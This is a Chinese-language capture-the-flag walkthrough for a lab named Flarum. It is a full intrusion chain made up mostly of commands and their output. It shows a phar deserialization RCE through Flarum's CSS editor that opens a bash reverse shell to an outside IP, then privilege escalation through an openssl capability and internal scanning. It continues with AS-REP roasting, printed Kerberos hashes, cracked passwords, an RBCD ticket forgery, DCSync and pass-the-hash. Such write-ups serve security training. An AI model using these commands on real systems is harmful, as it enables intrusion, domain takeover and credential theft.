春秋雲鏡 Flarum

訪問發現是個Flarum CMS框架.

使用rockyou.txt爆破administrator得到密碼1chris,登入後臺
由於題目提示Flarum上執行任意命令,搜到了P牛的文章
照著打反序列化.
執行命令

./phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/123.57.23.40/1111 0>&1'"

生成tar格式的phar檔案包
將得到的base64替換
@import (inline) 'data:text/css;base64,xxx';中的xxx
然後複製到後臺修改css處

並儲存.然後訪問主頁確保css成功重新整理.再次重新修改css,對我們的phar進行檔案包含.

.test {
    content: data-uri('phar://./assets/forum.css');
}

點選儲存會卡一會,然後成功彈shell
發現沒有root資料夾檢視許可權,
沒法suid提權,這裡需要使用capability提權

getcap -r / 2>/dev/null

這裡的openssl可以提權

openssl enc -in "/root/flag/flag01.txt"

得到第一個flag: flag{2f62c0ea-121e-40f2-ba75-9c8368a2a89a}
傳個代理,傳個fscan去掃描

172.22.60.8:139 open
172.22.60.42:135 open
172.22.60.15:135 open
172.22.60.8:135 open
172.22.60.52:80 open
172.22.60.52:22 open
172.22.60.42:445 open
172.22.60.15:445 open
172.22.60.8:445 open
172.22.60.42:139 open
172.22.60.15:139 open
172.22.60.8:88 open
[*] NetInfo:
[*]172.22.60.42
   [->]Fileserver
   [->]172.22.60.42
   [->]169.254.83.27
[*] NetInfo:
[*]172.22.60.8
   [->]DC
   [->]172.22.60.8
   [->]169.254.42.35
[*] NetBios: 172.22.60.8     [+]DC XIAORANG\DC              
[*] NetBios: 172.22.60.15    XIAORANG\PC1                   
[*] NetInfo:
[*]172.22.60.15
   [->]PC1
   [->]172.22.60.15
   [->]169.254.178.145
[*] NetBios: 172.22.60.42    XIAORANG\FILESERVER            
[*] WebTitle: http://172.22.60.52       code:200 len:5867   title:霄壤社群

之前登入後臺的時候看到了一堆使用者和郵箱.

然而不是很方便去導下來.我們登入後臺資料庫去處理.
檢視config檔案獲取資料庫登入的賬號和密碼.

使用nvcat登陸將指定列匯出(我蟻劍,nvcat啥的都沒成功,手動一點一點打的)
打一個AS-REQ Roasting

proxychains impacket-GetNPUsers -dc-ip 172.22.60.8  xiaorang.lab/ -usersfile flarum_users.txt

得到

$krb5asrep$23$wangyun@XIAORANG.LAB:7113eff57f6a311ae31c6954239295c4$6d61457220f4a148bdb66b2eb60186c19fb59036b11408b4a16030a55f2e578917decac987e4bef1e5b758211a8a6657d7dcd7497a4f9f8d8574f19080146e794982c7dc0b9b86510cadc4c3ff84a7afef6fd51000c46cba3868799e5fe89a824acb90903b5e5a5da72503f30a8c9d016f298b2d3686bb75abfc48a7a2d31adc45600d6718c8b8b9712855c5f157c64f163e24fba17b0f926a62821344782e519d392da64129562cc04d0a098cdfb9d3c0101519c3b6c359467e061672ddde3853fa0101e1d6fa384cb4df313b6b6c4b0c8c8269f54dc9a4f04392ea6ad7c37084f0e3519e827a66f113f86b
$krb5asrep$23$zhangxin@XIAORANG.LAB:6a1df11dffef818977a03d01e7e34240$cc37025841b68c245336912104d4a4f0585c81685912feb5a08fe36e2c38e3ff550cc2902b8d7af2ad2846b4f6e9f785691b06d036c2941003af6eb13317da739a7fbd9779629345134d2d15b641684e477834e24eb9dc1fce6c912d9655813526175a3de0af09d778072cf2be2e7ef1d15e0b57850ebcb2e549d9e1638dde0f5f6809cd880635c759cf5074c238179b5377e5735b01be55b68f3f339eebe4382722d061b070ac328f912b2118efdafa99f81f5a7260ec253bafca4ebacae63e86627a20a2b80e5e1fd326a537d8c5d88a95273584549e47af14b54ee36a3c99244ef1405164903d963e4593

隨便挑一個使用者去爆一下

hashcat -m 18200 --force -a 0 '雜湊'  /usr/share/wordlists/rockyou.txt

爆破得到使用者名稱和密碼wangyun@XIAORANG.LAB/Adm12geC
用這個使用者名稱和密碼跑一下bloodhound

proxychains bloodhound-python -u wangyun -p Adm12geC -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp

發現使用者zhangxin是Account Operator,對FileServer 有GenericAll許可權.我們可以去打一個RBCD提權.
首先要有zhangxin的使用者才行.我們先掃一下這個172.22.60.15看看

發現開了3389,rdp上去,發現有個xshell.我們點選提示讓我們更新.這就沒法玩了...

看wp知道要抓xshell的賬號密碼.
傳個SharpXDecrypt去跑一下

成功抓到了zhangxin的密碼admin4qwY38cc
接下來打RBCD,嘗試按照網鼎杯半決賽的打
新增機器賬戶01

proxychains python3 addcomputer.py -method SAMR xiaorang.lab/zhangxin:admin4qwY38cc -computer-name 01\$ -computer-pass Passw0rd -dc-ip 172.22.60.8

傳個powerview.ps1上去抓取機器賬戶sid

Import-Module .\PowerView.ps1
Get-NetComputer 01 -Properties objectsid

sid:S-1-5-21-3535393121-624993632-895678587-1116
修改172.22.60.42(FILESERVER)機器的msDS-AllowedToActOnBehalfOfOtherIdentity屬性,使其指向01

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1116)";$SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer FILESERVER | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

偽造一個Administrator的ST

proxychains impacket-getST xiaorang.lab/01\$:Passw0rd -spn cifs/FILESERVER.xiaorang.lab -impersonate administrator -dc-ip 172.22.60.8

匯入票據

export KRB5CCNAME==administrator@cifs_FILESERVER.xiaorang.lab@XIAORANG.LAB.ccache

改hosts,雜湊橫傳登入

proxychains python3 ~/CTFtools/impacket/examples/psexec.py Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8 -codec gbk

成功得到shell

flag:flag{c2385619-1870-4cbe-99d9-5c2a7e3e110d}
此時獲得的是機器的管理員許可權,可以直接DCSync(Bloodhound中有提示可以)
抓一下這個FIlESERVER的雜湊

proxychains python3 secretsdump.py -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8

其中FILESERVER的NTLM是XIAORANG\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::
進行DCSync攻擊

proxychains ~/CTFtools/impacket/examples/secretsdump.py xiaorang.lab/'FILESERVER$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator 

c3cfdc08527ec4ab6aa3e630e79d349b就是域控的雜湊
使用雜湊橫傳去拿PC1的雜湊

proxychains crackmapexec smb 172.22.60.15 -u administrator -Hc3cfdc08527ec4ab6aa3e630e79d349b -d xiaorang.lab -x "type C:\\Users\Administrator\flag\f*"

flag:flag{4a616538-8131-4d7e-9bd3-2452c232de32}

proxychains crackmapexec smb 172.22.60.8 -u administrator -Hc3cfdc08527ec4ab6aa3e630e79d349b -d xiaorang.lab -x "type C:\\Users\Administrator\flag\f*"

flag:flag{48fb52f2-e15d-473d-85b9-4889e1e136f6}